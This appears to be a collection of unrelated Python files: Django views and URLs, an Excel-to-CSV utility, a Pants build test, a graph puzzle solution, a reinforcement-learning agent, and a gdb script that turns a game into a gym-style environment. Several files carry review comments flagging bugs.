    ('cabinet', views.Cabinet),
    ('group', views.Group),
    ('dashboard', views.Dashboard),
    ('monitor', views.Monitor),
)

urlpatterns = [
    url(r'^%s/(?P<action>\w+)/$' % prefix, csrf_exempt(view.as_view()))
    for prefix, view in _ROUTES
]
|
# -*- coding: utf-8 -*-
# lib_excel.py written by Duncan Murray 11/2/2014
import csv
import os
import sys
from collections import namedtuple
import glob
from random import randint
import collections
import xlrd
# make the sibling aspytk toolkit importable before pulling in its modules
fldr = os.getcwd() + '//..//aspytk'
print('startup folder = ' + fldr)
sys.path.append(fldr)
import lib_file as fle
import lib_data as dat
import sys
print(sys.version)
def csv_from_excel(excel_file, pth):
    """Export every worksheet of pth/excel_file to its own CSV file.

    NOTE(review): Python 2 only -- uses xrange, unicode and a 'wb' csv
    handle; port these deliberately before running under Python 3.
    """
    opFname = ''
    print('converting file ' + excel_file + ' to folder ' + pth)
    workbook = xlrd.open_workbook(pth + '\\' + excel_file)
    all_worksheets = workbook.sheet_names()
    for worksheet_name in all_worksheets:
        print('converting - ' + worksheet_name)
        worksheet = workbook.sheet_by_name(worksheet_name)
        # output name: <workbook>_<worksheet>.csv next to the source file
        opFname = pth + '\\' + os.path.splitext(excel_file)[0] + '_' + worksheet_name + '.csv'
        print('SAVING - ' + opFname)
        csv_file = open(opFname, 'wb')
        #csv_file = open(pth + ''.join([worksheet_name,'.csv']), 'wb')
        wr = csv.writer(csv_file, quoting=csv.QUOTE_ALL)
        for rownum in xrange(worksheet.nrows):
            wr.writerow([unicode(entry).encode("utf-8") for entry in worksheet.row_values(rownum)])
        csv_file.close()
def Step1_Convert_XLS_toCSV(fldr):
    """Convert every .xlsx workbook under *fldr* into per-worksheet CSVs."""
    for workbook_path in fle.GetFileList(fldr, ['*.xlsx'], [".CSV"], True):
        print(workbook_path)
        csv_from_excel(os.path.basename(workbook_path), os.path.dirname(workbook_path))
def Step2_AnalyseFiles(opFolder, fldr):
    """Log the line count of every CSV under *fldr* to _opList.csv and run a
    column analysis on each file, writing results into *opFolder*."""
    csv_files = fle.GetFileList(fldr, ['*.CSV'], [".XLSX"], True)
    print(csv_files)
    summary_file = os.getcwd() + '\\_opList.csv'
    fle.deleteFile(summary_file)  # start the summary from scratch
    for csv_name in csv_files:
        line_count = dat.countLinesInFile(csv_name)
        print(csv_name)
        fle.AppendToFile(summary_file, csv_name + ',' + str(line_count) + '\n')
        AnalyseCSV_File(csv_name, opFolder)
        #os.system('analyseCSV.py "' + csv_name + '" "' + csvFileName_RES + '"')
def AnalyseCSV_File(datafile, opFolder):
    """Write per-column value and count summaries for *datafile* into
    *opFolder* (<base>_COL_VALUES.csv and <base>_COL_COUNTS.csv).

    The unused `tmpfile` variable was dropped and the manual colNum counter
    replaced with enumerate.
    """
    baseName = opFolder + '\\' + os.path.basename(datafile).split('.')[0]
    colHeaders = dat.GetColumnList(datafile)
    for colNum, col in enumerate(colHeaders):
        colText = "".join(map(str, col))  # just the column name from the list item
        print(colText)
        dat.GetCountUniqueValues(datafile, colNum, colText, 10, baseName + '_COL_VALUES.csv')
        dat.GetColumnCounts(datafile, colNum, colText, baseName + '_COL_COUNTS.csv')
######################
## Main Program ##
######################
print('\n lib_excel.py - importing source data\n')
Step1_Convert_XLS_toCSV(os.getcwd())
# NOTE(review): Step2_AnalyseFiles(opFolder, fldr) receives a *list* as fldr
# here while Step1 passes a plain path string -- confirm fle.GetFileList
# accepts both forms.
Step2_AnalyseFiles(os.getcwd(), [os.getcwd()])
print('Done..')
|
from django.conf.urls import url
from points import apis
# single endpoint: the points-table API served at the app root
urlpatterns = [
    url(r'^$', apis.PointsTableApi.as_view(), name="api_points_table")
]
|
from django.db import models
class Student(models.Model):
    # Student record with Portuguese field names supplied via the `name=`
    # kwarg. NOTE(review): passing name= to a Field is unusual (the first
    # positional argument is verbose_name); confirm the intended
    # attribute/column naming before relying on the English attribute names.
    name = models.CharField(name='nome', max_length=255, db_index=True)
    birthday = models.DateField(name='nascimento')
    age = models.IntegerField(name='idade')
    # CPF: Brazilian taxpayer ID, up to 14 chars including punctuation
    cpf = models.CharField(name='cpf', max_length=14, db_index=True)
    street = models.CharField(name='rua', max_length=255)
    number = models.CharField(name='numero', max_length=10)
    complement = models.CharField(name='complemento', max_length=15)
    # NOTE(review): 'distric' looks like a typo for 'district'; renaming now
    # would require a schema migration, so it is only flagged here.
    distric = models.CharField(name='bairro', max_length=255)
|
from PIL import Image, ImageDraw, ImageFont


def addNum(filePath, text="6"):
    """Stamp *text* (default "6", keeping the original behavior) in red in
    the top-right corner of the image at *filePath*, save it as result.jpg
    and display it.

    BUG FIX: size[1] / 4 is a float under Python 3 and ImageFont.truetype
    requires an integer size, so integer division is used now.
    NOTE(review): the font path is Windows-specific -- confirm target OS.
    """
    img = Image.open(filePath)
    width, height = img.size
    fontSize = height // 4
    draw = ImageDraw.Draw(img)
    ttFont = ImageFont.truetype(r"C:\Windows\Fonts\Arial.ttf", fontSize)
    draw.text((width - fontSize, 0), text, (255, 0, 0), font=ttFont)
    del draw
    img.save("result.jpg")
    img.show()
if __name__ == '__main__':
    # demo: stamp the default digit onto a local sample image
    addNum("image.jpg")
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os
import platform
import shutil
from dataclasses import dataclass
from textwrap import dedent
from typing import Mapping, MutableMapping
import pytest
from pants.backend.python.goals.export import PythonResolveExportFormat
from pants.testutil.pants_integration_test import run_pants, setup_tmpdir
from pants.util.contextutil import temporary_dir
SOURCES = {
"3rdparty/BUILD": dedent(
"""\
python_requirement(name='req1', requirements=['ansicolors==1.1.8'], resolve='a', modules=['colors'])
python_requirement(name='req2', requirements=['ansicolors==1.0.2'], resolve='b', modules=['colors'])
"""
),
"src/python/foo.py": "from colors import *",
"src/python/BUILD": dedent(
"""\
python_source(name='foo', source='foo.py', resolve=parametrize('a', 'b'))
python_distribution(
name='dist',
provides=python_artifact(name='foo-dist', version='1.2.3'),
dependencies=[':foo@resolve=a'],
)
"""
),
}
@dataclass
class _ToolConfig:
    """Description of a tool used to parametrize export tests."""

    name: str
    version: str
    experimental: bool = False
    backend_prefix: str | None = "lint"
    takes_ics: bool = True

    @property
    def package(self) -> str:
        """Importable package name: the tool name with dashes as underscores."""
        return "_".join(self.name.split("-"))
def build_config(tmpdir: str, py_resolve_format: PythonResolveExportFormat) -> Mapping:
    """Assemble the minimal pants config dict shared by the export tests:
    python backend enabled, two lockfile-backed resolves rooted at *tmpdir*,
    the current interpreter pinned, and the requested export format."""
    lockfile = lambda resolve: f"{tmpdir}/3rdparty/{resolve}.lock"
    return {
        "GLOBAL": {
            "backend_packages": ["pants.backend.python"],
        },
        "python": {
            "enable_resolves": True,
            "interpreter_constraints": [f"=={platform.python_version()}"],
            "resolves": {name: lockfile(name) for name in ("a", "b")},
        },
        "export": {"py_resolve_format": py_resolve_format.value},
    }
@pytest.mark.parametrize(
    "py_resolve_format",
    [
        PythonResolveExportFormat.mutable_virtualenv,
        PythonResolveExportFormat.symlinked_immutable_virtualenv,
    ],
)
def test_export(py_resolve_format: PythonResolveExportFormat) -> None:
    """End-to-end check that `pants export` materializes both resolves as
    virtualenvs with the right ansicolors version, and (for mutable venvs)
    installs the editable wheel for the python_distribution only into the
    resolve that owns it."""
    with setup_tmpdir(SOURCES) as tmpdir:
        resolve_names = ["a", "b"]
        run_pants(
            [
                "generate-lockfiles",
                "export",
                *(f"--resolve={name}" for name in resolve_names),
                "--export-py-editable-in-resolve=['a']",
            ],
            config=build_config(tmpdir, py_resolve_format),
        ).assert_success()
        export_prefix = os.path.join("dist", "export", "python", "virtualenvs")
        assert os.path.isdir(
            export_prefix
        ), f"expected export prefix dir '{export_prefix}' does not exist"
        py_minor_version = f"{platform.python_version_tuple()[0]}.{platform.python_version_tuple()[1]}"
        for resolve, ansicolors_version in [("a", "1.1.8"), ("b", "1.0.2")]:
            export_resolve_dir = os.path.join(export_prefix, resolve)
            assert os.path.isdir(
                export_resolve_dir
            ), f"expected export resolve dir '{export_resolve_dir}' does not exist"
            # each resolve exports one venv per interpreter version
            export_dir = os.path.join(export_resolve_dir, platform.python_version())
            assert os.path.isdir(export_dir), f"expected export dir '{export_dir}' does not exist"
            if py_resolve_format == PythonResolveExportFormat.symlinked_immutable_virtualenv:
                assert os.path.islink(
                    export_dir
                ), f"expected export dir '{export_dir}' is not a symlink"
            lib_dir = os.path.join(export_dir, "lib", f"python{py_minor_version}", "site-packages")
            assert os.path.isdir(lib_dir), f"expected export lib dir '{lib_dir}' does not exist"
            # the pinned third-party requirement must land in site-packages
            expected_ansicolors_dir = os.path.join(
                lib_dir, f"ansicolors-{ansicolors_version}.dist-info"
            )
            assert os.path.isdir(
                expected_ansicolors_dir
            ), f"expected dist-info for ansicolors '{expected_ansicolors_dir}' does not exist"
            if py_resolve_format == PythonResolveExportFormat.mutable_virtualenv:
                expected_foo_dir = os.path.join(lib_dir, "foo_dist-1.2.3.dist-info")
                if resolve == "b":
                    assert not os.path.isdir(
                        expected_foo_dir
                    ), f"unexpected dist-info for foo-dist '{expected_foo_dir}' exists"
                elif resolve == "a":
                    # make sure the editable wheel for the python_distribution is installed
                    assert os.path.isdir(
                        expected_foo_dir
                    ), f"expected dist-info for foo-dist '{expected_foo_dir}' does not exist"
                    # direct_url__pants__.json should be moved to direct_url.json
                    expected_foo_direct_url_pants = os.path.join(
                        expected_foo_dir, "direct_url__pants__.json"
                    )
                    assert not os.path.isfile(
                        expected_foo_direct_url_pants
                    ), f"expected direct_url__pants__.json for foo-dist '{expected_foo_direct_url_pants}' was not removed"
                    expected_foo_direct_url = os.path.join(expected_foo_dir, "direct_url.json")
                    assert os.path.isfile(
                        expected_foo_direct_url
                    ), f"expected direct_url.json for foo-dist '{expected_foo_direct_url}' does not exist"
def test_symlinked_venv_resilience() -> None:
    """A symlinked export must point into the pex_root cache and must be
    restorable by re-running `pants export` after the cache is wiped."""
    with temporary_dir() as named_caches:
        pex_root = os.path.join(os.path.realpath(named_caches), "pex_root")
        with setup_tmpdir(SOURCES) as tmpdir:
            run_pants(
                [
                    f"--named-caches-dir={named_caches}",
                    "generate-lockfiles",
                    "export",
                    "--resolve=a",
                ],
                config=build_config(
                    tmpdir, PythonResolveExportFormat.symlinked_immutable_virtualenv
                ),
            ).assert_success()
        def check():
            # the export must be a symlink whose target lives under pex_root
            export_dir = os.path.join(
                "dist", "export", "python", "virtualenvs", "a", platform.python_version()
            )
            assert os.path.islink(export_dir)
            export_dir_tgt = os.readlink(export_dir)
            assert os.path.isdir(export_dir_tgt)
            assert os.path.commonpath([pex_root, export_dir_tgt]) == pex_root
        check()
        # wipe the cache and re-export: the symlink target must come back
        shutil.rmtree(pex_root)
        run_pants(
            [f"--named-caches-dir={named_caches}", "export", "--resolve=a"],
            config=build_config(
                tmpdir, PythonResolveExportFormat.symlinked_immutable_virtualenv
            ),
        ).assert_success()
        check()
|
#!/bin/python3
import os
import sys
#
# Complete the roadsInHackerland function below.
#
def roadsInHackerland(n, roads):
    """Return (as a binary string) the sum of shortest-path distances over
    all node pairs, where an edge of cost c weighs 2**c.

    A Dijkstra-like scan is run from every node; for each source only the
    nodes after the source (D.index(0)+1 onward) are counted so each pair
    contributes once.
    NOTE(review): the print() calls below look like leftover debug output,
    and 2*(10**5) serves as the "infinity" sentinel -- confirm it exceeds
    any reachable distance for the intended input sizes.
    """
    # adjacency matrix; -1 marks "no edge", weights are 2**cost
    edges = [[-1 for _ in range(n + 1)] for _ in range(n + 1)]
    for road in roads:
        v1, v2, cost = road
        edges[v1][v2] = 2 ** cost
        edges[v2][v1] = 2 ** cost
    result = []
    for idx in range(1, n + 1):
        cnt = 0
        start_node = idx
        # D: tentative distances (sentinel = infinity); C: visited marks
        D = [2 * (10 ** 5)] * (n + 1)
        C = [-1] * (n + 1)
        D[start_node] = 0
        while cnt != n:
            C[start_node] = 1
            connected_node = []
            # relax all neighbours of the current node
            for node in range(1, len(edges[start_node])):
                if edges[start_node][node] != -1:
                    if D[node] > D[start_node] + edges[start_node][node]:
                        D[node] = D[start_node] + edges[start_node][node]
                    connected_node.append((D[node], node))
            # pick the closest unvisited neighbour as the next start node
            min_val_node_cost = 2 * 10 ** 5
            min_val_node = -1
            for tmp in connected_node:
                if C[tmp[1]] != -1:
                    continue
                else :
                    if min_val_node_cost > tmp[0]:
                        min_val_node = tmp[1]
                        min_val_node_cost = tmp[0]
            start_node = min_val_node
            cnt += 1
        # count only pairs after the source to avoid double counting
        for item in D[D.index(0)+1:]:
            if item != 2 * (10 ** 5):
                result.append(item)
    print(result)
    print(format(sum(result), 'b'))
    return format(sum(result), 'b')
if __name__ == '__main__':
    # fptr = open(os.environ['OUTPUT_PATH'], 'w')
    # read "n m" (node and road counts), then m lines of "u v cost" from stdin
    nm = input().split()
    n = int(nm[0])
    m = int(nm[1])
    roads = []
    for _ in range(m):
        roads.append(list(map(int, input().rstrip().split())))
    result = roadsInHackerland(n, roads)
    # fptr.write(result + '\n')
    #
    # fptr.close()
|
# nested-dict demo: one entry per child, each mapping to a name and birth year
# NOTE(review): "Linux" may be a typo for "Linus" -- confirm the intended data.
myfamily = {
    "child1": {
        "name": "Tobias",
        "year": 2009
    },
    "child2": {
        "name": "Emili",
        "year": 2010
    },
    "child3": {
        "name": "Linux",
        "year": 2015
    }
}
print(myfamily)
|
import numpy as np
from collections import defaultdict
class Agent:
    """Tabular Expected-SARSA agent with an epsilon-greedy behaviour policy."""

    def __init__(self, nA=6):
        """ Initialize agent.

        Params
        ======
        - nA: number of actions available to the agent
        """
        self.nA = nA
        self.Q = defaultdict(lambda: np.zeros(self.nA))
        # learning rate, discount factor and exploration settings
        self.alpha = 0.90
        self.gamma = 0.96
        self.epsilon = 0.005
        self.i_episode = 1
        self.policy_s = None  # probabilities from the last select_action call

    def get_probs(self, Q_s, i_episode, eps=None):
        """Return epsilon-greedy action probabilities for action values Q_s.

        epsilon decays as 1/i_episode unless an explicit *eps* is given.
        """
        epsilon = eps if eps is not None else 1.0 / i_episode
        probs = np.full(self.nA, epsilon / self.nA)
        greedy_action = np.argmax(Q_s)
        probs[greedy_action] = 1 - epsilon + (epsilon / self.nA)
        return probs

    def Update_Q(self, Q_sa, Q_sa_next, reward):
        """One TD step: move Q_sa toward reward + gamma * Q_sa_next."""
        td_target = reward + self.gamma * Q_sa_next
        return Q_sa + self.alpha * (td_target - Q_sa)

    def select_action(self, state):
        """Sample an action from the epsilon-greedy policy for *state*."""
        self.policy_s = self.get_probs(self.Q[state], self.i_episode, eps=0.0005)
        self.i_episode += 1
        return np.random.choice(np.arange(self.nA), p=self.policy_s)

    def step(self, state, action, reward, next_state, done):
        """Expected-SARSA update using the most recent behaviour policy."""
        expected_next_q = np.dot(self.Q[next_state], self.policy_s)
        self.Q[state][action] = self.Update_Q(self.Q[state][action], expected_next_q, reward)
|
from CompteSimple import CompteSimple
from Transaction import Transaction


class CompteCourant(CompteSimple):
    """Current account that records a Transaction history on top of
    CompteSimple.

    BUG FIX: _historique used to be a *class* attribute, so every
    CompteCourant instance shared one single history list; it is now
    created per instance in __init__. NOTE(review): any external code that
    read CompteCourant._historique directly would need updating -- none is
    visible in this file.
    """

    def __init__(this, initMnt = 0):
        CompteSimple.__init__(this, initMnt)
        this._historique = []

    def afficherHistorique(this):
        """Print every recorded transaction, then the current balance."""
        for transaction in this._historique:
            message = ''
            montant = transaction.getMontant()
            if transaction.getTransactionType() == Transaction.CREDIT:
                message = "--CREDIT-- d'un montant de " + str(montant) + " euros"
            else:
                # debits are stored positive; display them negated
                montant = montant * -1
                message = "--DEBIT-- d'un montant de " + str(montant) + " euros"
            print(message)
        print("SOLDE TOTAL = " + str(CompteSimple.getSolde(this)))

    # mask
    def credit(this, montant):
        """Record the credit in the history, then delegate to CompteSimple."""
        this._historique.append(Transaction(Transaction.CREDIT, montant))
        CompteSimple.credit(this, montant)

    # mask
    def debit(this, montant):
        """Record the debit in the history, then delegate to CompteSimple."""
        this._historique.append(Transaction(Transaction.DEBIT, montant))
        CompteSimple.debit(this, montant)
|
__all__ = ['dynamodb']
|
# -*- coding: utf-8 -*-
# Personal Assistant Reliable Intelligent System
# By Tanguy De Bels
from Senses.mouth import speak
from Utilities.tools import *
import net
import os
from time import localtime, strftime
from datetime import date
def h(msg):
    """Speak the current time in French; speak() picks one of the phrasings."""
    time = strftime("%X", localtime()).split(":")
    speak([" Il est " + supress_zero(time[0]) + " heures et " + supress_zero(time[1]) + " minutes.", " Il est " + supress_zero(time[0]) + " heures " + supress_zero(time[1]), " " + supress_zero(time[0]) + " heures " + supress_zero(time[1])])
def d(msg):
    """Speak today's date in French; speak() picks one of the phrasings."""
    dat = date.today().strftime("%Y-%m-%d").split('-')
    speak([" Nous sommes le " + days(date.today().weekday()) + supress_zero(dat[2]) + months(supress_zero(dat[1])), " Nous sommes le " + supress_zero(dat[2]) + months(supress_zero(dat[1]))])
def sound(message):
    """Adjust the system master volume via nircmd based on French keywords
    in *message* (mute / unmute / lower / raise, optionally 'un peu')."""
    if (u'coupe') in message:
        os.system('nircmd.exe mutesysvolume 1')
        return
    if (u'remets' in message):
        os.system('nircmd.exe mutesysvolume 0')
        return
    small_step = (u'un peu') in message
    if (u'baisse') in message or (u'diminue') in message:
        os.system(u'nircmd.exe changesysvolume -6553' if small_step
                  else u'nircmd.exe changesysvolume -13107')
    elif (u'augmente') in message or (u'monte') in message:
        # make sure the output is unmuted before raising the level
        os.system(u'nircmd.exe mutesysvolume 0')
        os.system(u'nircmd.exe changesysvolume 6553' if small_step
                  else u'nircmd.exe changesysvolume 13107')
def bright(message):
    """Adjust screen brightness via nircmd based on French keywords in
    *message* ('un peu' halves the step size)."""
    small_step = (u'un peu') in message
    if (u'baisse') in message or (u'diminue') in message:
        os.system(u'nircmd.exe changebrightness -10' if small_step
                  else u'nircmd.exe changebrightness -20')
    elif (u'augmente') in message or (u'monte') in message:
        os.system(u'nircmd.exe changebrightness 10' if small_step
                  else u'nircmd.exe changebrightness 20')
def search(message):
    """Extract the query following a French preposition and run a web search.

    The first matching marker wins, so the order below matters (note the
    original checks 'à propos de' before 'à propos des').
    """
    markers = (u'sur', u'à propos du', u'à propos de', u'à propos des', u'à propos d\'')
    for marker in markers:
        if marker in message:
            query = message.split(marker)[1]
            break
    else:
        query = message
    #TypeOfSearch:
    net.net_search(query)
|
from os import path
import os
import socket
import atexit
import pickle
import select
class _UDS(object):
    """Unix-domain-socket transport exchanging pickled Python objects.

    One side constructs with server=True (binds/accepts on SOCK_FILE), the
    other with server=False (connects). Each message must pickle to fewer
    than BUFF_SIZE bytes and is assumed to arrive in a single recv() --
    acceptable for the tiny local payloads used here.
    """
    SOCK_FILE = path.join(path.dirname(__file__), 'pikaball.socket')
    BUFF_SIZE = 256
    def __init__(self, server):
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        def rm(f):
            # best-effort unlink of the socket file
            try:
                os.remove(f)
            except FileNotFoundError:
                pass
        @atexit.register
        def cleaner():
            # close the socket and remove the socket file at interpreter exit
            sock.close()
            rm(self.SOCK_FILE)
        if server:
            # remove any stale socket file before binding
            rm(self.SOCK_FILE)
            sock.bind(self.SOCK_FILE)
            sock.listen(1)
            self.conn, _ = sock.accept()
        else:
            sock.connect(self.SOCK_FILE)
            self.conn = sock
    def incoming(self):
        # non-blocking poll: is data ready to be read?
        sl, _, _ = select.select([self.conn], [], [], 0.001)
        return bool(sl)
    def send(self, obj):
        """Pickle *obj* and send it; asserts the whole payload fit and went out."""
        payload = pickle.dumps(obj)
        size = len(payload)
        assert size < self.BUFF_SIZE
        bsent = self.conn.send(payload)
        assert bsent == size
    def recv(self):
        """Receive one pickled message and return the unpickled object."""
        bs = self.conn.recv(self.BUFF_SIZE)
        return pickle.loads(bs)
class _AgentSocket(_UDS):
    """Agent-side endpoint: sends actions, receives observations."""
    send_action = _UDS.send
    recv_observation = _UDS.recv
    observation_ready = _UDS.incoming
    def __init__(self):
        print('Connecting to environment...')
        # NOTE(review): _UDS.__init__ returns None, so self.sock is always
        # None; the live handle is self.conn, set by the base class.
        self.sock = _UDS.__init__(self, server=False)
        print('Connected')
class _EnvironmentSocket(_UDS):
    """Environment-side endpoint: sends observations, receives actions."""
    send_observation = _UDS.send
    recv_action = _UDS.recv
    def __init__(self):
        print('Waiting for agent...')
        # NOTE(review): as in _AgentSocket, self.sock is always None; the
        # live handle is self.conn from the base class.
        self.sock = _UDS.__init__(self, server=True)
        print('Connected')
if __name__ == '__main__':
    # --- gdb side: this module is sourced inside gdb attached to the game;
    # it captures game-state addresses and bridges frames/actions to the agent
    from gdb import parse_and_eval as pae
    from math import copysign
    import gdb
    import struct
    def loadaddrs(configs):
        """Plant breakpoints that capture the runtime addresses of the named
        game variables into the returned dict (values start as None)."""
        addrs = {}
        class BP(gdb.Breakpoint):
            def __init__(self, ip, assignments, cond):
                gdb.Breakpoint.__init__(self, ip)
                self.silent = True
                # gdb.Breakpoint.condition does not prevent `stop`
                # from being called, so here we use our own attribute
                # so condition won't be checked twice
                self.cond = cond
                self.assignments = assignments
            def stop(self):
                if bool(pae(self.cond)):
                    for k, value_expr in self.assignments:
                        v = int(pae(value_expr))
                        addrs[k] = v
                        print('{0} @ 0x{1:08X}'.format(k, v))
                    self.enabled = False
                return False
        for ip, assignments, condition in configs:
            for k, _ in assignments:
                addrs[k] = None
            BP(ip, assignments, condition)
        return addrs
    # shortcuts into the debugged process's memory
    bytes2int = int.from_bytes
    inferior = gdb.selected_inferior()
    writemem = inferior.write_memory
    readmem = inferior.read_memory
    def readshort(addr):
        # game-state variables are little-endian 16-bit integers
        return bytes2int(readmem(addr, 2), 'little')
    def agent_disconnected():
        print('Agent disconnected')
        gdb.execute('quit')
    class DecisionBreakpoint(gdb.Breakpoint):
        """Breakpoint at the game's per-frame decision point: reads the frame,
        exchanges (observation, reward, terminal) / action with the agent over
        the UDS socket, and injects the chosen key states into game memory."""
        # expected variable values at the start of a fresh round
        INIT_FRAME = [('LX',36),('LY',244),('BY',1),('RX',396),('RY',244)]
        #{'BX': 56, 'LS': 13, 'RS': 3, 'RY': 244, 'BY': 6, 'RX': 396, 'LX': 48, 'LY': 213}
        BREAK_ADDR = 0x00403D90
        def __init__(self, addrs):
            gdb.Breakpoint.__init__(self, '*%d' % self.BREAK_ADDR)
            self.silent = True
            self.addrs = addrs
            self.action = (-1, -1, -1)
            self.wait_init = True
            self.prev_ball = (-1, -1)
            self.socket = _EnvironmentSocket()
        def stop(self):
            try:
                frame = dict((k, readshort(a)) for k, a in self.addrs.items())
            except TypeError:
                # addrs not fully loaded yet
                return False
            if self.wait_init:
                self.wait_init = any(frame[k] != v for k, v in self.INIT_FRAME)
                if self.wait_init:
                    by = struct.pack('i', 300) # 300: below ground
                    writemem(self.addrs['BY'], by) # force ball below ground to end round
                    return False
                else:
                    # reset the scores
                    writemem(self.addrs['RS'], '\0')
                    writemem(self.addrs['LS'], '\0')
                    frame['RS'], frame['LS'] = 0, 0
                    # this is the correct initial ball position
                    self.prev_ball = (frame['BX'], 0)
                    while self.action is not None:
                        # agent needs to have sent a reset (None) action
                        # to observe first frame
                        self.action = self.socket.recv_action()
            # ball position from previous frame is the correct current ball position
            bx, by = frame['BX'], frame['BY']
            frame['BX'], frame['BY'] = self.prev_ball
            self.prev_ball = bx, by
            # reward is the sign of the score change (right minus left)
            scorediff = frame['RS'] - frame['LS']
            reward = 0 if scorediff == 0 else copysign(1, scorediff)
            self.wait_init = terminal = reward != 0
            try:
                self.socket.send_observation((frame, reward, terminal))
                self.action = action = self.socket.recv_action()
            except (BrokenPipeError, ConnectionResetError, EOFError):
                agent_disconnected()
            if action:
                # map each action component to key state -1/0/1 and write it
                ss = [1 if a > 0 else -1 if a < 0 else 0 for a in action]
                bs = struct.pack('iii', *ss)
                base = int(pae('$eax')) + 0x10 # base of right player
                writemem(base, bs)
                #print('KEY (0x{:08X}): {}'.format(base, str(bs)))
            else:
                # agent resets environment
                self.wait_init = True
            return False
    # quieten gdb and ignore the game's SIGUSR1 before resuming it
    gdb.execute('set print thread-events off')
    gdb.execute('set pagination off')
    gdb.execute('set confirm off')
    gdb.execute('handle SIGUSR1 nostop noprint')
    addrs = loadaddrs([
        # break at *0x004027B1, set value for LX to $esi+0xA8, and LY.. if *($esi+0xA8) < 216
        ('*0x004027B1', [('LX', '$esi+0xA8'), ('LY', '$esi+0xAC')], '*($esi+0xA8) < 216'),
        ('*0x004027B1', [('RX', '$esi+0xA8'), ('RY', '$esi+0xAC')], '*($esi+0xA8) > 216'),
        ('*0x00402EB4', [('BX', '$esi+0x30'), ('BY', '$esi+0x34')], '1'),
        ('*0x00403D4B', [('LS', '$esi+0x3C'), ('RS', '$esi+0x40')], '1')
    ])
    db = DecisionBreakpoint(addrs)
    gdb.execute('continue')
else:
    # --- agent side: imported as a gym-like environment module exposing
    # observation_space, action_space, reset() and step()
    from itertools import product
    import numpy as np
    class _Object(object):
        # tiny attribute bag used to mimic gym space objects
        def __init__(self, **attrs):
            for k, v in attrs.items():
                self.__setattr__(k, v)
    # all combinations of horizontal / vertical / power-hit key states
    _ACTIONS = list(product([-1,0,1],[-1,0,1],[0,1]))
    # https://github.com/openai/gym/blob/master/gym/spaces/box.py
    observation_space = _Object(
        high = np.array([432.0, 323.0]*3),
        low = np.zeros(6),
        shape = lambda: (6,)
    )
    # https://github.com/openai/gym/blob/master/gym/spaces/discrete.py
    action_space = _Object(
        n = 18,
        labels = ['%s %s %s' % (' ><'[h], ' ∨∧'[v], ' N'[n]) for h, v, n in _ACTIONS]
    )
    _done = True
    _socket = _AgentSocket()
    def _observe():
        # pull one (frame, reward, terminal) tuple and flatten the frame
        # into the fixed 6-value observation vector
        global _done
        frame, reward, terminal = _socket.recv_observation()
        observation = np.array([frame[k] for k in ['LX', 'LY', 'RX', 'RY', 'BX', 'BY']], dtype=np.float32)
        _done = terminal
        return observation, reward, terminal
    def reset():
        # a None action asks the gdb side to restart the round
        _socket.send_action(None)
        observation, _, _ = _observe()
        return observation
    def step(action):
        assert not _done, 'step called after end of episode before resetting'
        a = _ACTIONS[action]
        _socket.send_action(a)
        observation, reward, done = _observe()
        return observation, reward, done, {}
|
def divident(data,start,length,wordList ,res):
    """Recursively enumerate ways of splitting *data* into leading segments,
    appending completed segmentations to *res*.

    NOTE(review): several things look wrong and should be confirmed against
    the intended spec before use:
      - `wordList = wordList + temp` re-binds inside the loop, so segments
        from earlier loop iterations leak into later recursion branches;
      - `newLength = length - i` subtracts an absolute index from a length
        (probably meant `length - (i - start)`);
      - `data_temp` is already sliced at i, yet `newStart` also advances,
        double-shifting the window.
    """
    #length = len(data)
    print("length is ", length)
    if length == 0:
        # a complete segmentation: record it
        res.append(wordList)
        return
    for i in range(start+1,start+length):
        temp = data[start:i]
        wordList = wordList+ temp
        data_temp = data[i:]
        print("wordlist is", wordList, " i is ",i," data is ",data_temp)
        newLength = length - i
        newStart = start + i
        divident(data_temp,newStart,newLength,wordList,res)
# Demo driver: enumerate the segmentations of a small list and print them.
data =[1,2,3]
print("data is ",data)
res=[]
wordList =[]
length = len(data)
divident(data,0, length,wordList,res)
print("res is ", res)
|
from django.shortcuts import render
from django.core.paginator import Paginator
from django.forms.models import model_to_dict
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from playlist.models.Radio import Radio
from playlist.forms import RadioForm
def add_radio(request):
    """Display an empty radio form on GET; create a Radio on a valid POST.

    On an invalid POST the bound form (with errors) is re-rendered.
    """
    if request.method == 'POST':
        # Bind the form to the submitted data; Django performs validation.
        form = RadioForm(request.POST)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect(reverse('radios'))
    else:
        # Unbound (empty) form for the initial GET.
        form = RadioForm()
    return render(request, 'radio_form.html', context={'form': form})
def edit_radio(request, radio_id):
    """Edit an existing Radio.

    GET renders the form pre-filled with the radio's current values; a valid
    POST saves the changes and redirects to the radio list.

    Fixes: the parameter was named `Radio_id` while the body read `radio_id`
    (guaranteed NameError, and inconsistent with delete_radio), and
    `model_to_dict` was given the Radio class instead of the fetched instance.
    """
    # May raise Radio.DoesNotExist for an unknown pk (unchanged behaviour).
    radio = Radio.objects.get(pk=radio_id)
    if request.method == 'POST':
        form = RadioForm(request.POST, instance=radio)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect(reverse('radios'))
    else:
        # model_to_dict must receive the instance, not the model class.
        fields = model_to_dict(radio)
        form = RadioForm(initial=fields, instance=radio)
    context = {
        'form': form,
        'type': 'edit',
    }
    return render(request, 'radio_form.html', context=context)
def delete_radio(request, radio_id):
    """Show a confirmation page on GET; delete the Radio on POST."""
    radio = Radio.objects.get(pk=radio_id)
    # Guard clause: anything but POST just renders the confirmation form.
    if request.method != 'POST':
        return render(request, 'radio_delete_form.html', context={'radio': radio})
    radio.delete()
    return HttpResponseRedirect(reverse('radios'))
def list_radio(request):
    """List all Radio objects.

    Fix: the original read and wrote the same local name
    (`radio = radio.objects.all()`), raising UnboundLocalError; the query
    must go through the Radio model class.
    """
    radios = Radio.objects.all()
    context = {
        'radio': radios,  # template key kept as 'radio' for compatibility
    }
    return render(request, 'Radio.html', context=context)
|
import tornado.ioloop
import tornado.httpserver
import tornado.web
import tornado.websocket
import tornado.gen
from tornado import httpclient
class Application(tornado.web.Application):
    """Tornado application wiring URL routes to their handlers."""

    def __init__(self):
        routes = [
            (r"/", IndexHandler),
            (r"/now", BitNowHandler),
        ]
        # Settings passed inline instead of via an intermediate dict.
        tornado.web.Application.__init__(
            self,
            routes,
            template_path="templates",
            static_path="static",
        )
class IndexHandler(tornado.web.RequestHandler):
    """Serves the landing page."""

    def get(self):
